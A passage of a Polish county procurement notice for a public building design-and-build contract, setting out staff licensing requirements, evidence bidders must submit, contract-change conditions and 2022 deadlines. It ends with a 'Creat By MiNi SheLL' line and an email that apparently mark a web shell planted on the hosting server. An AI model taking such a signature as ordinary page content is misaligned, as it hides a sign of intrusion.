projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych,<br/>j)	1 osoba z wykształceniem geologicznym posiadająca uprawnienia kategorii VI lub VII <br/><br/>Zamawiający dopuszcza dowolne łączenie uprawnień budowlanych do projektowania w różnych specjalnościach w ramach tej samej osoby. <br/><br/>W zakresie kierowania robotami budowlanymi:<br/>k)	1 osoba, która będzie pełnić funkcję kierownika budowy i kierownika robót, posiadająca uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej, która pełniła funkcję kierownika budowy przy co najmniej jednej robocie budowlanej polegającej na budowie nowego, rozbudowie lub przebudowie istniejącego budynku użyteczności publicznej o powierzchni użytkowej powstałej w wyniku budowy/ rozbudowy/przebudowy budynku nie mniejszej niż 2000 m2,<br/>l)	1 osoba, która będzie pełnić funkcję kierownika robót posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej, <br/>m)	1 osoba, która będzie pełnić funkcję kierownika robót posiadająca uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych oraz doświadczenie polegające na pełnieniu funkcji kierownika robót przy co najmniej jednej robocie budowlanej polegającej na budowie nowego, rozbudowie lub przebudowie istniejącego budynku użyteczności publicznej,<br/>n)	1 osoba, która będzie pełnić funkcję kierownika robót posiadająca uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci i instalacji i urządzeń cieplnych oraz doświadczenie polegające na pełnieniu funkcji kierownika robót przy co najmniej jednej robocie budowlanej polegającej na budowie nowego, rozbudowie lub przebudowie istniejącego budynku użyteczności publicznej,<br/>o)	1 osoba, która będzie pełnić funkcję kierownika robót posiadająca uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci i instalacji i urządzeń wentylacyjnych oraz doświadczenie polegające na pełnieniu funkcji kierownika robót przy co najmniej jednej robocie budowlanej polegającej na budowie nowego, rozbudowie lub przebudowie istniejącego budynku użyteczności publicznej,<br/>p)	1 osoba, która będzie pełnić funkcję kierownika robót posiadająca uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci i instalacji i urządzeń gazowych oraz doświadczenie polegające na pełnieniu funkcji kierownika robót przy co najmniej jednej robocie budowlanej polegającej na budowie nowego, rozbudowie lub przebudowie istniejącego budynku użyteczności publicznej,<br/>q)	1 osoba, która będzie pełnić funkcję kierownika robót posiadająca uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci i instalacji i urządzeń wodociągowych i kanalizacyjnych oraz doświadczenie polegające na pełnieniu funkcji kierownika robót przy co najmniej jednej robocie budowlanej polegającej na budowie nowego, rozbudowie lub przebudowie istniejącego budynku użyteczności publicznej,<br/>r)	1 osoba, która będzie pełnić funkcję kierownika robót posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych oraz doświadczenie polegające na pełnieniu funkcji kierownika robót przy co najmniej jednej robocie budowlanej polegającej na budowie nowego, rozbudowie lub przebudowie istniejącego budynku użyteczności publicznej.<br/><br/>Zamawiający dopuszcza dowolne łączenie uprawnień budowlanych w ramach tej samej osoby w ramach uprawnień określonych w lit. od l) do r). <br/><br/>W odniesieniu do warunku, określonego w pkt 3) Zamawiający dopuszcza sumowanie potencjału, co oznacza że:<br/>1)	w przypadku wykonawców wspólnie ubiegających się o zamówienie warunek udziału może spełnić jeden, kilku lub łącznie wszyscy wykonawcy wspólnie ubiegający się o udzielenie zamówienia albo<br/>2)	w przypadku, gdy Wykonawca polega na zdolności innych podmiotów:<br/>a)	Wykonawca i inny podmiot mogą łącznie wykazać, że spełniają warunek albo<br/>b)	inne podmioty, na których zdolności polega wykonawca mogą łącznie wykazać, że spełniają warunek.<br/><br/>Zgodnie z art. 104 ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (t.j. Dz.U. z 2021 r. poz. 2351 ze zm.) osoby, które, przed dniem wejścia w życie ustawy, uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. Zamawiający uzna również wymagane uprawnienia budowlane do kierowania robotami budowlanymi nabyte w innych niż Rzeczpospolita Polska państwach członkowskich Unii Europejskiej, państwach członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stronach umowy o Europejskim Obszarze Gospodarczym, Konfederacji Szwajcarskiej, na zasadach określonych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. z 2021 r., poz. 2351). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	W celu dokonania oceny spełniania warunku udziału w postępowaniu Zamawiający wezwie w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania Wykonawcę, którego oferta zostanie najwyżej oceniona do złożenia aktualnego na dzień jego złożenia:<br/>1)	wykazu usług wykonanych w okresie ostatnich 3 lat, a jeśli okres prowadzenia działalności jest krótszy- w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie. Dowodami są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy. Wzór wykazu stanowi załącznik nr 5 do SWZ.<br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji usług wykonywanych wspólnie z innymi wykonawcami, wykaz usług dotyczy usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/><br/>2)	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wraz z podaniem ich rodzaju, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie. Wzór wykazu stanowi załącznik nr 6 do SWZ.<br/><br/>Dowodami są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/><br/> Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi wykonawcami, wykaz robót dotyczy robót budowlanych, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/><br/>3)	wykazu osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług lub kierowanie robotami budowlanymi wraz z informacjami na temat ich uprawnień, doświadczenia, wykształcenia, zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wzór oświadczenia stanowi załącznik nr 7 do SWZ.<br/>2.Wykonawca, który polega na zdolnościach innych podmiotów składa wraz z ofertą zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/> Zobowiązanie można przedłożyć zgodnie ze wzorem stanowiącym załącznik nr 8 do SWZ lub jako inny dokument potwierdzający, że stosunek łączący Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów. Z treści zobowiązania musi wynikać: zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby, sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia, czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane i usługi wykonają poszczególni Wykonawcy. Wzór oświadczenia stanowi Załącznik nr 9 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Jeżeli w imieniu Wykonawcy lub Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub podmiotu udostępniającego zasoby działa osoba, której umocowanie do jego reprezentacji nie wynika z odpisu lub informacji Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, Wykonawca zobowiązany jest przedłożyć z ofertą pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania odpowiednio Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub podmiotu udostępniającego zasoby. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	W odniesieniu do warunków udziału w postępowaniu dotyczących kwalifikacji zawodowych i doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych Wykonawców, którzy wykonają roboty budowlane i usługi, do realizacji których te zdolności są wymagane.<br/>2.	W przypadku, o którym mowa w ust. 1 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane i usługi wykonają poszczególni Wykonawcy. Wzór oświadczenia stanowi Załącznik nr 9 do SWZ.<br/>3.	Wspólnicy spółki cywilnej są traktowani jak Wykonawcy składający ofertę wspólną. Wykonawcy ci, w okolicznościach, o których mowa w art. 117 ust. 3 ustawy Pzp zobowiązani są dołączyć do oferty oświadczenie, o którym mowa w ust.2.<br/>4.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wszelka korespondencja prowadzona będzie z pełnomocnikiem Konsorcjum, jeżeli załączone pełnomocnictwo nie będzie wskazywało inaczej.<br/>5.	Jeżeli w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia działa osoba, której umocowanie do jego reprezentacji nie wynika z odpisu lub informacji Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, Wykonawca zobowiązany jest przedłożyć z ofertą pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Istotne zmiany umowy w stosunku do treści oferty mogą nastąpić tylko w formie pisemnej pod rygorem nieważności, w następujących przypadkach:<br/>1)	wydłużenie terminu realizacji przedmiotu umowy może nastąpić za zgodą Stron z powodu:<br/>a)	wystąpienia braku możliwości wykonywania robót na skutek niedopuszczenia do ich wykonywania przez uprawniony organ lub nakazania ich wstrzymania przez uprawniony organ z przyczyn niezależnych od Wykonawcy - przedłużenie terminu o ilość dni wstrzymania robót,<br/>b)	udokumentowanej nieobecności z powodu pandemii pracowników lub osób świadczących pracę za wynagrodzeniem na innej podstawie niż stosunek pracy, które uczestniczą lub mają uczestniczyć w realizacji przedmiotu umowy po Stronie Zamawiającego lub Wykonawcy – o ilość dni udokumentowanej nieobecności,<br/>c)	decyzji wydanych przez Głównego Inspektora Sanitarnego lub działającego z jego upoważnienia państwowego wojewódzkiego inspektora sanitarnego, w związku z przeciwdziałaniem pandemii, nakładających na Wykonawcę lub Zamawiającego, obowiązek podjęcia określonych czynności zapobiegawczych lub kontrolnych - o czas trwania zaistniałej sytuacji,<br/>d)	poleceń lub decyzji wydanych przez wojewodów, ministra właściwego do spraw zdrowia lub Prezesa Rady Ministrów, związanych z przeciwdziałaniem pandemii, - o czas trwania zaistniałej sytuacji,<br/>e)	innych udokumentowanych okoliczności, które uniemożliwiają bądź w istotnym stopniu ograniczają możliwość wykonania przedmiotu umowy z powodu pandemii - o czas trwania zaistniałej sytuacji,<br/>f) wystąpienia okoliczności niezależnych od Wykonawcy, których nie mógł on przewidzieć, w szczególności:<br/>- jeżeli w trakcie realizacji robót zajdzie konieczność wykonania robót, o których mowa w art. 455 ust. 1 pkt 3, 4 i ust.2 ustawy Prawo zamówień publicznych, w wyniku których konieczne będzie wydłużenie terminu realizacji przedmiotu umowy – o czas niezbędny do zakończenia realizacji przedmiotu umowy w sposób należyty,<br/>- wystąpi siła wyższa, przez co należy rozumieć zdarzenie nieprzewidywalne o charakterze zewnętrznym (w tym żywiołowym typu: huragany, powódź, epidemia lub inne kataklizmy, wojna), nie do uniknięcia i pozostające poza kontrolą Stron, następstwom której Strony nie mogły zapobiec, uniemożliwiająca Stronom realizację zobowiązań w ramach niniejszej umowy – o czas niezbędny do zakończenia realizacji przedmiotu umowy w sposób należyty,<br/>g)	wystąpi konieczność wykonania dodatkowych badań, ekspertyz, analiz – o czas niezbędny do ich wykonania,<br/>h)	wystąpią okoliczności uniemożliwiające terminowe zakończenie realizacji przedmiotu umowy, które wystąpiły z przyczyn leżących po stronie Zamawiającego– o czas trwania przyczyny,<br/>2)	zmiany umowy w zakresie osób wymienionych w Rozdziale VIII ust. 1 pkt 3 SWZ jeżeli nowo wyznaczona osoba posiadać będzie kwalifikacje i doświadczenie odpowiadające wymaganiom określonym przez Zamawiającego w SWZ oraz doświadczenie wykazane przez Wykonawcę w ramach kryterium oceny ofert „doświadczenie kluczowego personelu Wykonawcy”,<br/>3)	zmiana umowy w zakresie zmiany wysokości wynagrodzenia należnego Wykonawcy w przypadku zmiany:<br/>a)	stawki podatku od towarów i usług oraz podatku akcyzowego, <br/>b)	wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, <br/>c)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub ubezpieczenie zdrowotne, <br/>d)	zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (Dz. U. poz. 2215 oraz z 2019 r. poz. 1074 i 1572), <br/>e)	ceny materiałów lub kosztów związanych z realizacją przedmiotu umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-09 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć na Platformie pod adresem: https://powiat-olsztynski.ezamawiajacy.pl w zakładce „OFERTY”</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-09 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-07</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Zamawiający działając na podstawie art. 4 ust. 3 w związku z ust. 4 ustawy z dnia 19 lipca 2019 r. o zapewnianiu dostępności osobom ze szczególnymi potrzebami (Dz. U 2020 poz. 1062) określa, iż Wykonawca jest zobowiązany do wykonania dokumentacji projektowej z uwzględnieniem zasad projektowania uniwersalnego, w ten sposób, iż projekt architektoniczno-budowlany będzie uwzględniać niezbędne warunki do korzystania z obiektu przez osoby ze szczególnymi potrzebami, o których mowa w przedmiotowej ustawie.<br/>2.	Wykonawca zobowiązuje się do przygotowania dokumentacji projektowej w szczególności spełniającej wymagania, o których mowa w art. 6 pkt. 1 ustawy z dnia 19 lipca 2019 r. o zapewnianiu dostępności osobom ze szczególnymi potrzebami, tj.:<br/>1)	zostaną zapewnione wolne od barier poziome i pionowe przestrzenie komunikacyjne,<br/>2)	zostanie zapewniony dostęp do wszystkich pomieszczeń, z wyłączeniem pomieszczeń technicznych,<br/>3) zostanie zapewniona wizualna oraz głosowa informacja na temat rozkładu pomieszczeń,<br/>4) zostaną przewidziane rozwiązania umożliwiające osobom ze szczególnymi potrzebami możliwości ewakuacji lub ich uratowania w inny sposób.<br/>3.	Na podstawie art. 95 ustawy Pzp, Zamawiający wymaga, aby poniższe czynności polegające na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy, podczas realizacji zamówienia wykonywane były przez osoby zatrudnione przez Wykonawcę lub podwykonawcę na podstawie stosunku pracy:<br/>1)	roboty ziemne,<br/>2)	roboty konstrukcyjno-budowlane,<br/>3)	roboty w zakresie budowy sieci i instalacji, <br/>4)	roboty wykończeniowe,<br/>5)	roboty w zakresie zagospodarowania terenu.<br/>4.	Zapisy dotyczące sposobu weryfikacji zatrudnienia osób wykonujących czynności, o których mowa w ust. 10 oraz uprawnień Zamawiającego w zakresie kontroli spełniania przez Wykonawcę wymagań związanych z zatrudnianiem tych osób oraz sankcji z tytułu niespełnienia tych wymagań znajdują się w projektowanych postanowieniach umowy stanowiących załącznik nr 10 do SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com